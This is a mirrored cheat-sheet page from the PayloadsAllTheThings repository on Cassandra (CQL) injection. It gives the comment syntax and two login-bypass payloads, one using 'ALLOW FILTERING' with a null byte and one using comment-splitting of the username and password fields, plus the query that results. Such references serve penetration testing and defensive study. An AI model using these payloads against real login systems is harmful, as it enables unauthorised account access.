mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 23:32:45 +00:00
fdc44ce84e
Broken link [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
763 B
763 B
Cassandra Injection
Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
Summary
Cassandra comment
/* Cassandra Comment */
Cassandra - Login Bypass
Login Bypass 0
username: admin' ALLOW FILTERING; %00
password: ANY
Login Bypass 1
username: admin'/*
password: */and pass>'
The injection would look like the following SQL query
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;